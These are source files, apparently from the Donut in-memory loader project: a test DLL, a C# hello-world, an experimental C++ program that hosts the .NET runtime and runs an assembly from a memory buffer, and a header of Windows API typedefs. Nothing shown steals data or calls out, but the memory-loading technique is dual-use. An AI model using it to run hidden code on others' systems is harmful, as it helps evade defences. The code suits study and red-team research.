7 | #include <inttypes.h> | |
8 | ||
9 | #include <windows.h> | |
10 | #pragma comment(lib, "user32.lib") | |
11 | #pragma comment(lib, "shell32.lib") | |
12 | ||
13 | __declspec(dllexport) | |
14 | VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) { | |
15 | PROCESS_INFORMATION pi; | |
16 | STARTUPINFO si; | |
17 | ||
18 | ZeroMemory(&si, sizeof(si)); | |
19 | si.cb = sizeof(si); | |
20 | CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); | |
21 | ||
22 | ZeroMemory(&si, sizeof(si)); | |
23 | si.cb = sizeof(si); | |
24 | CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); | |
25 | } | |
26 | ||
27 | __declspec(dllexport) | |
28 | VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) { | |
29 | WCHAR msg[4096]; | |
30 | ||
31 | _snwprintf(msg, ARRAYSIZE(msg), | |
32 | L"param[0] : %ws\r" | |
33 | L"param[1] : %ws\r" | |
34 | L"param[2] : %ws\r" | |
35 | L"param[3] : %ws\r", | |
36 | arg0, arg1, arg2, arg3); | |
37 | ||
38 | MessageBox(NULL, msg, L"Donut Test", MB_OK); | |
39 | } | |
40 | ||
41 | __declspec(dllexport) | |
42 | BOOL WINAPI DllMain(HMODULE hModule, | |
43 | DWORD ul_reason_for_call, | |
44 | LPVOID lpReserved) { | |
45 | switch (ul_reason_for_call) { | |
46 | case DLL_PROCESS_ATTACH: | |
47 | MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0); | |
48 | break; | |
49 | case DLL_THREAD_ATTACH: | |
50 | case DLL_THREAD_DETACH: | |
51 | case DLL_PROCESS_DETACH: | |
52 | break; | |
53 | } | |
54 | return TRUE; | |
55 | } |
0 | // A Hello World! program in C#. | |
1 | using System; | |
2 | namespace HelloWorld | |
3 | { | |
4 | class Hello | |
5 | { | |
6 | static void Main() | |
7 | { | |
8 | Console.WriteLine("Hello World!"); | |
9 | ||
10 | // Keep the console window open in debug mode. | |
11 | Console.WriteLine("Press any key to exit."); | |
12 | Console.ReadKey(); | |
13 | } | |
14 | } | |
15 | } |
0 | ||
1 | // code to implement hooking ProcessExit from unmanaged code | |
2 | // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8 | |
3 | // | |
4 | #include <windows.h> | |
5 | #include <oleauto.h> | |
6 | #include <mscoree.h> | |
7 | #include <comdef.h> | |
8 | #include <propvarutil.h> | |
9 | #include <metahost.h> | |
10 | ||
11 | #include <cstdio> | |
12 | #include <cstdint> | |
13 | #include <cstring> | |
14 | #include <cstdlib> | |
15 | #include <sys/stat.h> | |
16 | ||
17 | #import "mscorlib.tlb" raw_interfaces_only | |
18 | #import "shdocvw.dll" | |
19 | ||
20 | #pragma comment(lib, "mscoree.lib") | |
21 | ||
22 | void my_function(void *evt) { | |
23 | printf("Received event\n"); | |
24 | } | |
25 | ||
26 | void DumpMethods(mscorlib::_TypePtr type) { | |
27 | mscorlib::_MethodInfoPtr mi; | |
28 | mscorlib::_ParameterInfoPtr pi; | |
29 | mscorlib::_TypePtr ptype; | |
30 | SAFEARRAY *sa, *params; | |
31 | HRESULT hr; | |
32 | LONG i, j, cnt, pcnt, lcnt, ucnt; | |
33 | BSTR name; | |
34 | VARIANT vt; | |
35 | VARTYPE var; | |
36 | ||
37 | hr = type->GetMethods( | |
38 | (mscorlib::BindingFlags) | |
39 | (mscorlib::BindingFlags_Static | | |
40 | mscorlib::BindingFlags_Public), | |
41 | &sa); | |
42 | ||
43 | if(hr == S_OK) { | |
44 | SafeArrayGetLBound(sa, 1, &lcnt); | |
45 | SafeArrayGetUBound(sa, 1, &ucnt); | |
46 | ||
47 | cnt = (ucnt - lcnt + 1); | |
48 | ||
49 | for(i=0; i<cnt; i++) { | |
50 | hr = SafeArrayGetElement(sa, &i, (void*)&mi); | |
51 | if(hr == S_OK) { | |
52 | mi->get_name(&name); | |
53 | printf("%ws(", name); | |
54 | hr = mi->GetParameters(¶ms); | |
55 | if(hr == S_OK) { | |
56 | SafeArrayGetLBound(params, 1, &lcnt); | |
57 | SafeArrayGetUBound(params, 1, &ucnt); | |
58 | ||
59 | pcnt = (ucnt - lcnt + 1); | |
60 | printf("%i", pcnt); | |
61 | for(j=0; j<pcnt; j++) { | |
62 | hr = SafeArrayGetElement(params, &j, (void*)&pi); | |
63 | ||
64 | // VARTYPE should be VT_UNKNOWN | |
65 | hr = SafeArrayGetVartype(params, &var); | |
66 | BSTR meth = SysAllocString(L"ParameterType"); | |
67 | DISPID id; | |
68 | // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id); | |
69 | //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id); | |
70 | printf("HRESULT : %lx\n", hr); | |
71 | } | |
72 | } | |
73 | printf(")\n"); | |
74 | } | |
75 | } | |
76 | } | |
77 | } | |
78 | ||
79 | void rundotnet(void *code, size_t len) { | |
80 | HRESULT hr; | |
81 | ICLRMetaHost *icmh; | |
82 | ICLRRuntimeInfo *icri; | |
83 | ICorRuntimeHost *icrh; | |
84 | IUnknownPtr iu; | |
85 | mscorlib::_AppDomainPtr ad; | |
86 | mscorlib::_AssemblyPtr as, as1, as2, as3; | |
87 | mscorlib::_MethodInfoPtr mi; | |
88 | mscorlib::_EventInfoPtr nfo; | |
89 | mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell; | |
90 | mscorlib::_DelegatePtr delegate; | |
91 | mscorlib::_ParameterInfoPtr param; | |
92 | mscorlib::_EventHandlerPtr handler; | |
93 | VARIANT v1, v2, v_ptr, v_type, ret; | |
94 | SAFEARRAY *sa, *sa2, *sav; | |
95 | SAFEARRAYBOUND sab; | |
96 | BOOL loadable; | |
97 | LONG idx; | |
98 | ||
99 | printf("CoCreateInstance(ICorRuntimeHost).\n"); | |
100 | ||
101 | hr = CLRCreateInstance( | |
102 | CLSID_CLRMetaHost, | |
103 | IID_ICLRMetaHost, | |
104 | (LPVOID*)&icmh); | |
105 | ||
106 | if(SUCCEEDED(hr)) { | |
107 | printf("ICLRMetaHost::GetRuntime\n"); | |
108 | ||
109 | hr = icmh->GetRuntime( | |
110 | L"v4.0.30319", | |
111 | IID_ICLRRuntimeInfo, (LPVOID*)&icri); | |
112 | ||
113 | if(SUCCEEDED(hr)) { | |
114 | printf("ICLRRuntimeInfo::IsLoadable\n"); | |
115 | hr = icri->IsLoadable(&loadable); | |
116 | ||
117 | if(SUCCEEDED(hr) && loadable) { | |
118 | printf("ICLRRuntimeInfo::GetInterface\n"); | |
119 | ||
120 | hr = icri->GetInterface( | |
121 | CLSID_CorRuntimeHost, | |
122 | IID_ICorRuntimeHost, | |
123 | (LPVOID*)&icrh); | |
124 | } else return; | |
125 | } else return; | |
126 | } else return; | |
127 | ||
128 | printf("ICorRuntimeHost::Start()\n"); | |
129 | hr = icrh->Start(); | |
130 | if(SUCCEEDED(hr)) { | |
131 | printf("ICorRuntimeHost::GetDefaultDomain()\n"); | |
132 | hr = icrh->GetDefaultDomain(&iu); | |
133 | if(SUCCEEDED(hr)) { | |
134 | printf("IUnknown::QueryInterface()\n"); | |
135 | hr = iu->QueryInterface(IID_PPV_ARGS(&ad)); | |
136 | if(SUCCEEDED(hr)) { | |
137 | BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"); | |
138 | // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName | |
139 | BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"); | |
140 | ||
141 | BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"); | |
142 | ||
143 | hr = ad->Load_2(str1, &as1); // load automation | |
144 | hr = ad->Load_2(strX, &as3); // load interop services | |
145 | printf("Loading System.Management.Automation : %lx\n", hr); | |
146 | hr = ad->Load_2(str2, &as2); // load mscorlib | |
147 | ||
148 | BSTR alloc = SysAllocString(L"Create"); | |
149 | BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell"); | |
150 | hr = as1->GetType_2(marshal, &mars); | |
151 | ||
152 | printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars); | |
153 | ||
154 | DumpMethods(mars); | |
155 | ||
156 | // to retrieve a method, the SAFEARRAY is of IUnknown types | |
157 | // this method doesn't accept anything, so just allocate array for it | |
158 | sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0); | |
159 | ||
160 | hr = mars->GetMethod(alloc, | |
161 | (mscorlib::BindingFlags) | |
162 | (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public), | |
163 | NULL, // Binder | |
164 | sav, // SAFEARRAY(_Type*) | |
165 | NULL, // Modifiers | |
166 | &mi); // MethodInfo | |
167 | ||
168 | printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi); | |
169 | ||
170 | v1.vt = VT_EMPTY; | |
171 | VariantClear(&ret); | |
172 | ||
173 | hr = mi->Invoke_3( | |
174 | v1, | |
175 | NULL, // arguments to method | |
176 | &ret); // return value from method | |
177 | ||
178 | printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError()); | |
179 | ||
180 | // at this point, we have the powershell object. we just need to call AddScript | |
181 | // method, but this is an IDisposable | |
182 | ||
183 | sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1); | |
184 | BSTR object = SysAllocString(L"System.Object"); | |
185 | ||
186 | as2->GetType_2(object, &ptr); | |
187 | idx = 0; | |
188 | SafeArrayPutElement(sav, &idx, ptr); | |
189 | ||
190 | BSTR get_obj = SysAllocString(L"GetIUnknownForObject"); | |
191 | BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal"); | |
192 | hr = as3->GetType_2(mars_str, &mars); | |
193 | ||
194 | printf("Marshal : %p\n", (PVOID)mars); | |
195 | ||
196 | hr = mars->GetMethod(get_obj, | |
197 | (mscorlib::BindingFlags) | |
198 | (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public), | |
199 | NULL, // Binder | |
200 | sav, // SAFEARRAY(_Type*) | |
201 | NULL, // Modifiers | |
202 | &mi); // MethodInfo | |
203 | ||
204 | printf("GetMethod() : %lx %p\n", hr, (PVOID)mi); | |
205 | ||
206 | sav = SafeArrayCreateVector(VT_VARIANT, 0, 1); | |
207 | idx = 0; | |
208 | SafeArrayPutElement(sav, &idx, &ret.punkVal); | |
209 | ||
210 | v1.vt = VT_EMPTY; | |
211 | VARIANT unk; | |
212 | VariantClear(&unk); | |
213 | ||
214 | hr = mi->Invoke_3( | |
215 | v1, | |
216 | sav, // arguments to method | |
217 | &unk); // return value from method | |
218 | ||
219 | printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk)); | |
220 | getchar(); | |
221 | return; | |
222 | ||
223 | // SAFEARRAY(_Type*) | |
224 | sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2); | |
225 | ||
226 | // add System.IntPtr | |
227 | BSTR str4 = SysAllocString(L"System.IntPtr"); | |
228 | as2->GetType_2(str4, &ptr); | |
229 | //DumpMethods(ptr); | |
230 | idx = 0; | |
231 | hr = SafeArrayPutElement(sav, &idx, ptr); | |
232 | ||
233 | // add System.Type | |
234 | BSTR str5 = SysAllocString(L"System.Type"); | |
235 | as2->GetType_2(str5, &type); | |
236 | idx = 1; | |
237 | SafeArrayPutElement(sav, &idx, type); | |
238 | ||
239 | BSTR str6 = SysAllocString(L"GetIUnknownForObject"); | |
240 | BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal"); | |
241 | hr = as1->GetType_2(str3, &mars); | |
242 | ||
243 | hr = mars->GetMethod(str6, | |
244 | (mscorlib::BindingFlags) | |
245 | (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public), | |
246 | NULL, // Binder | |
247 | sav, // SAFEARRAY(_Type*) | |
248 | NULL, // Modifiers | |
249 | &mi); // MethodInfo | |
250 | ||
251 | printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi); | |
252 | ||
253 | BSTR str9 = SysAllocString(L"ProcessExit"); | |
254 | BSTR strA = SysAllocString(L"System.AppDomain"); | |
255 | ||
256 | hr = as2->GetType_2(strA, &evt); | |
257 | printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt); | |
258 | ||
259 | hr = evt->GetEvent(str9, | |
260 | (mscorlib::BindingFlags) | |
261 | (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public), | |
262 | &nfo); | |
263 | ||
264 | printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo); | |
265 | ||
266 | hr = nfo->get_EventHandlerType(&evt); | |
267 | printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt); | |
268 | ||
269 | BSTR type_name, base_name; | |
270 | mscorlib::_TypePtr base_type, ref_type; | |
271 | ||
272 | evt->get_name(&type_name); | |
273 | evt->get_BaseType(&base_type); | |
274 | base_type->get_name(&base_name); | |
275 | ||
276 | wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name); | |
277 | ||
278 | printf("my_function = %p\n", (void*)my_function); | |
279 | ||
280 | // SAFEARRAY(VARIANT) | |
281 | sav = SafeArrayCreateVector(VT_VARIANT, 0, 2); | |
282 | ||
283 | VariantClear(&v_ptr); | |
284 | V_BYREF(&v_ptr) = (PVOID)my_function; | |
285 | V_VT(&v_ptr) = VT_INT; | |
286 | ||
287 | idx = 0; | |
288 | SafeArrayPutElement(sav, &idx, &v_ptr); | |
289 | ||
290 | BSTR strZ = SysAllocString(L"System.MultiDelegate"); | |
291 | hr = as2->GetType_2(strZ, &type); | |
292 | printf("System.Delegate = %lx, %p\n", hr, (void*)type); | |
293 | ||
294 | idx = 1; | |
295 | V_VT(&v_type) = VT_UNKNOWN; | |
296 | V_UNKNOWN(&v_type) = type; | |
297 | SafeArrayPutElement(sav, &idx, &type); | |
298 | ||
299 | v1.vt = VT_EMPTY; | |
300 | VariantClear(&ret); | |
301 | ||
302 | printf("Calling GetDelegateForFunctionPointer\n"); | |
303 | hr = mi->Invoke_3( | |
304 | v1, | |
305 | sav, // arguments to method | |
306 | &ret); // return value from method | |
307 | ||
308 | printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret)); | |
309 | ||
310 | /**if(hr != S_OK) { | |
311 | printf("Failed to obtain delegate\n"); | |
312 | return; | |
313 | }*/ | |
314 | ||
315 | printf("Delegate : %p\n", ret.punkVal); | |
316 | ||
317 | hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler); | |
318 | printf("HRESULT : %08lx : %p\n", hr, (void*)handler); | |
319 | ||
320 | hr = ad->add_ProcessExit(handler); | |
321 | printf("HRESULT : %08lx\n", hr); | |
322 | ||
323 | sab.lLbound = 0; | |
324 | sab.cElements = len; | |
325 | printf("SafeArrayCreate()\n"); | |
326 | sa = SafeArrayCreate(VT_UI1, 1, &sab); | |
327 | ||
328 | if(sa != NULL) { | |
329 | CopyMemory(sa->pvData, code, len); | |
330 | printf("AppDomain::Load_3()\n"); | |
331 | hr = ad->Load_3(sa, &as); | |
332 | if(SUCCEEDED(hr)) { | |
333 | printf("Assembly::get_EntryPoint()\n"); | |
334 | hr = as->get_EntryPoint(&mi); | |
335 | if(SUCCEEDED(hr)) { | |
336 | v1.vt = VT_NULL; | |
337 | v1.plVal = NULL; | |
338 | printf("MethodInfo::Invoke_3()\n"); | |
339 | hr = mi->Invoke_3(v1, NULL, &v2); | |
340 | mi->Release(); | |
341 | } | |
342 | as->Release(); | |
343 | } | |
344 | SafeArrayDestroy(sa); | |
345 | } | |
346 | ad->Release(); | |
347 | } | |
348 | iu->Release(); | |
349 | } | |
350 | icrh->Stop(); | |
351 | } | |
352 | icrh->Release(); | |
353 | } | |
354 | ||
355 | int main(int argc, char *argv[]) | |
356 | { | |
357 | void *mem; | |
358 | struct stat fs; | |
359 | FILE *fd; | |
360 | ||
361 | if(argc != 2) { | |
362 | printf("usage: rundotnet <.NET assembly>\n"); | |
363 | return 0; | |
364 | } | |
365 | ||
366 | // 1. get the size of file | |
367 | stat(argv[1], &fs); | |
368 | ||
369 | if(fs.st_size == 0) { | |
370 | printf("file is empty.\n"); | |
371 | return 0; | |
372 | } | |
373 | ||
374 | // 2. try open assembly | |
375 | fd = fopen(argv[1], "rb"); | |
376 | if(fd == NULL) { | |
377 | printf("unable to open \"%s\".\n", argv[1]); | |
378 | return 0; | |
379 | } | |
380 | // 3. allocate memory | |
381 | mem = malloc(fs.st_size); | |
382 | if(mem != NULL) { | |
383 | // 4. read file into memory | |
384 | fread(mem, 1, fs.st_size, fd); | |
385 | // 5. run the program from memory | |
386 | rundotnet(mem, fs.st_size); | |
387 | // 6. free memory | |
388 | free(mem); | |
389 | } | |
390 | // 7. close assembly | |
391 | fclose(fd); | |
392 | ||
393 | return 0; | |
394 | } | |
395 | ||
396 | /** | |
397 | sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1); | |
398 | BSTR i32 = SysAllocString(L"System.Int32"); | |
399 | ||
400 | as2->GetType_2(i32, &ptr); | |
401 | idx = 0; | |
402 | SafeArrayPutElement(sav, &idx, ptr); | |
403 | ||
404 | BSTR alloc = SysAllocString(L"AllocHGlobal"); | |
405 | BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal"); | |
406 | hr = as1->GetType_2(marshal, &mars); | |
407 | ||
408 | hr = mars->GetMethod(alloc, | |
409 | (mscorlib::BindingFlags) | |
410 | (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public), | |
411 | NULL, // Binder | |
412 | sav, // SAFEARRAY(_Type*) | |
413 | NULL, // Modifiers | |
414 | &mi); // MethodInfo | |
415 | ||
416 | printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr); | |
417 | ||
418 | sav = SafeArrayCreateVector(VT_VARIANT, 0, 1); | |
419 | idx = 0; | |
420 | V_VT(&v_type) = VT_I4; | |
421 | V_I4(&v_type) = 0x12345678; | |
422 | SafeArrayPutElement(sav, &idx, &v_type); | |
423 | ||
424 | v1.vt = VT_EMPTY; | |
425 | VariantClear(&ret); | |
426 | ||
427 | printf("Press any key to continue...\n"); | |
428 | getchar(); | |
429 | ||
430 | printf("Calling AllocCoTaskMem\n"); | |
431 | hr = mi->Invoke_3( | |
432 | v1, | |
433 | sav, // arguments to method | |
434 | &ret); // return value from method | |
435 | ||
436 | printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret)); | |
437 | getchar(); | |
438 | return; | |
439 | */⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef WINAPI_H | |
32 | #define WINAPI_H | |
33 | ||
34 | #include <windows.h> | |
35 | ||
36 | typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds); | |
37 | ||
38 | typedef int (WINAPI *MultiByteToWideChar_t)( | |
39 | UINT CodePage, | |
40 | DWORD dwFlags, | |
41 | LPCCH lpMultiByteStr, | |
42 | int cbMultiByte, | |
43 | LPWSTR lpWideCharStr, | |
44 | int cchWideChar); | |
45 | ||
46 | typedef int (WINAPI *WideCharToMultiByte_t)( | |
47 | UINT CodePage, | |
48 | DWORD dwFlags, | |
49 | LPCWCH lpWideCharStr, | |
50 | int cchWideChar, | |
51 | LPSTR lpMultiByteStr, | |
52 | int cbMultiByte, | |
53 | LPCCH lpDefaultChar, | |
54 | LPBOOL lpUsedDefaultChar); | |
55 | ||
56 | // imports from shlwapi.dll | |
57 | typedef LSTATUS (WINAPI *SHGetValueA_t)( | |
58 | HKEY hkey, | |
59 | LPCSTR pszSubKey, | |
60 | LPCSTR pszValue, | |
61 | DWORD *pdwType, | |
62 | void *pvData, | |
63 | DWORD *pcbData); | |
64 | ||
65 | // imports from mscoree.dll | |
66 | typedef HRESULT (WINAPI *CLRCreateInstance_t)( | |
67 | REFCLSID clsid, | |
68 | REFIID riid, | |
69 | LPVOID *ppInterface); | |
70 | ||
71 | typedef HRESULT (WINAPI *CorBindToRuntime_t) ( | |
72 | LPCWSTR pwszVersion, | |
73 | LPCWSTR pwszBuildFlavor, | |
74 | REFCLSID rclsid, | |
75 | REFIID riid, | |
76 | LPVOID FAR *ppv); | |
77 | ||
78 | // imports from ole32.dll | |
79 | typedef HRESULT (WINAPI *CoInitializeEx_t)( | |
80 | LPVOID pvReserved, | |
81 | DWORD dwCoInit); | |
82 | ||
83 | typedef void (WINAPI *CoUninitialize_t)(void); | |
84 | ||
85 | typedef HRESULT (WINAPI *CoCreateInstance_t)( | |
86 | REFCLSID rclsid, | |
87 | LPUNKNOWN pUnkOuter, | |
88 | DWORD dwClsContext, | |
89 | REFIID riid, | |
90 | LPVOID *ppv); | |
91 | ||
92 | typedef HRESULT (WINAPI *CreateStdDispatch_t)( | |
93 | IUnknown *punkOuter, | |
94 | void *pvThis, | |
95 | ITypeInfo *ptinfo, | |
96 | IUnknown **ppunkStdDisp); | |
97 | ||
98 | typedef HRESULT (WINAPI *CreateErrorInfo_t)( | |
99 | ICreateErrorInfo **pperrinfo); | |
100 | ||
101 | typedef HRESULT (WINAPI *CreateDispTypeInfo_t)( | |
102 | INTERFACEDATA *pidata, | |
103 | LCID lcid, | |
104 | ITypeInfo **pptinfo); | |
105 | ||
106 | typedef HRESULT (WINAPI *GetErrorInfo_t)( | |
107 | ULONG dwReserved, | |
108 | IErrorInfo **pperrinfo); | |
109 | ||
110 | typedef HRESULT (WINAPI *LoadTypeLib_t)( | |
111 | LPCOLESTR szFile, | |
112 | ITypeLib **pptlib); | |
113 | ||
114 | typedef HRESULT (WINAPI *LoadTypeLibEx_t)( | |
115 | LPCOLESTR szFile, | |
116 | REGKIND regkind, | |
117 | ITypeLib **pptlib); | |
118 | ||
119 | typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID); | |
120 | ||
121 | // imports from oleaut32.dll | |
122 | typedef HRESULT (WINAPI *SafeArrayGetLBound_t)( | |
123 | SAFEARRAY *psa, | |
124 | UINT nDim, | |
125 | LONG *plLbound); | |
126 | ||
127 | typedef HRESULT (WINAPI *SafeArrayGetUBound_t)( | |
128 | SAFEARRAY *psa, | |
129 | UINT nDim, | |
130 | LONG *plUbound); | |
131 | ||
132 | typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)( | |
133 | VARTYPE vt, | |
134 | UINT cDims, | |
135 | SAFEARRAYBOUND *rgsabound); | |
136 | ||
137 | typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)( | |
138 | VARTYPE vt, | |
139 | LONG lLbound, | |
140 | ULONG cElements); | |
141 | ||
142 | typedef HRESULT (WINAPI *SafeArrayPutElement_t)( | |
143 | SAFEARRAY *psa, | |
144 | LONG *rgIndices, | |
145 | void *pv); | |
146 | ||
147 | typedef HRESULT (WINAPI *SafeArrayDestroy_t)( | |
148 | SAFEARRAY *psa); | |
149 | ||
150 | typedef BSTR (WINAPI *SysAllocString_t)( | |
151 | const OLECHAR *psz); | |
152 | ||
153 | typedef void (WINAPI *SysFreeString_t)( | |
154 | BSTR bstrString); | |
155 | ||
156 | // imports from kernel32.dll | |
157 | typedef HMODULE (WINAPI *LoadLibraryA_t)( | |
158 | LPCSTR lpLibFileName); | |
159 | ||
160 | typedef FARPROC (WINAPI *GetProcAddress_t)( | |
161 | HMODULE hModule, | |
162 | LPCSTR lpProcName); | |
163 | ||
164 | typedef BOOL (WINAPI *AllocConsole_t)(void); | |
165 | ||
166 | typedef BOOL (WINAPI *AttachConsole_t)( | |
167 | DWORD dwProcessId); | |
168 | ||
169 | typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)( | |
170 | PHANDLER_ROUTINE HandlerRoutine, | |
171 | BOOL Add); | |
172 | ||
173 | typedef HANDLE (WINAPI *GetStdHandle_t)( | |
174 | DWORD nStdHandle); | |
175 | ||
176 | typedef BOOL (WINAPI *SetStdHandle_t)( | |
177 | DWORD nStdHandle, | |
178 | HANDLE hHandle); | |
179 | ||
180 | typedef HANDLE (WINAPI *CreateFileA_t)( | |
181 | LPCSTR lpFileName, | |
182 | DWORD dwDesiredAccess, | |
183 | DWORD dwShareMode, | |
184 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, | |
185 | DWORD dwCreationDisposition, | |
186 | DWORD dwFlagsAndAttributes, | |
187 | HANDLE hTemplateFile); | |
188 | ||
189 | typedef HANDLE (WINAPI *CreateEventA_t)( | |
190 | LPSECURITY_ATTRIBUTES lpEventAttributes, | |
191 | BOOL bManualReset, | |
192 | BOOL bInitialState, | |
193 | LPCSTR lpName); | |
194 | ||
195 | typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject); | |
196 | ||
197 | typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent); | |
198 | ||
199 | typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID); | |
200 | ||
201 | typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID); | |
202 | ||
203 | typedef HHOOK (WINAPI *SetWindowsHookExA_t)( | |
204 | int idHook, | |
205 | HOOKPROC lpfn, | |
206 | HINSTANCE hmod, | |
207 | DWORD dwThreadId); | |
208 | ||
209 | typedef BOOL (WINAPI *CreateProcessA_t)( | |
210 | LPCSTR lpApplicationName, | |
211 | LPSTR lpCommandLine, | |
212 | LPSECURITY_ATTRIBUTES lpProcessAttributes, | |
213 | LPSECURITY_ATTRIBUTES lpThreadAttributes, | |
214 | BOOL bInheritHandles, | |
215 | DWORD dwCreationFlags, | |
216 | LPVOID lpEnvironment, | |
217 | LPCSTR lpCurrentDirectory, | |
218 | LPSTARTUPINFOA lpStartupInfo, | |
219 | LPPROCESS_INFORMATION lpProcessInformation); | |
220 | ||
221 | typedef DWORD (WINAPI *WaitForSingleObject_t)( | |
222 | HANDLE hHandle, | |
223 | DWORD dwMilliseconds); | |
224 | ||
225 | // imports from wininet.dll | |
226 | typedef BOOL (WINAPI *InternetCrackUrl_t)( | |
227 | LPCSTR lpszUrl, | |
228 | DWORD dwUrlLength, | |
229 | DWORD dwFlags, | |
230 | LPURL_COMPONENTS lpUrlComponents); | |
231 | ||
232 | typedef HINTERNET (WINAPI *InternetOpen_t)( | |
233 | LPCSTR lpszAgent, | |
234 | DWORD dwAccessType, | |
235 | LPCSTR lpszProxy, | |
236 | LPCSTR lpszProxyBypass, | |
237 | DWORD dwFlags); | |
238 | ||
239 | typedef HINTERNET (WINAPI *InternetConnect_t)( | |
240 | HINTERNET hInternet, | |
241 | LPCSTR lpszServerName, | |
242 | INTERNET_PORT nServerPort, | |
243 | LPCSTR lpszUserName, | |
244 | LPCSTR lpszPassword, | |
245 | DWORD dwService, | |
246 | DWORD dwFlags, | |
247 | DWORD_PTR dwContext); | |
248 | ||
249 | typedef HINTERNET (WINAPI *HttpOpenRequest_t)( | |
250 | HINTERNET hConnect, | |
251 | LPCSTR lpszVerb, | |
252 | LPCSTR lpszObjectName, | |
253 | LPCSTR lpszVersion, | |
254 | LPCSTR lpszReferrer, | |
255 | LPCSTR *lplpszAcceptTypes, | |
256 | DWORD dwFlags, | |
257 | DWORD_PTR dwContext); | |
258 | ||
259 | typedef BOOL (WINAPI *InternetSetOption_t)( | |
260 | HINTERNET hInternet, | |
261 | DWORD dwOption, | |
262 | LPVOID lpBuffer, | |
263 | DWORD dwBufferLength); | |
264 | ||
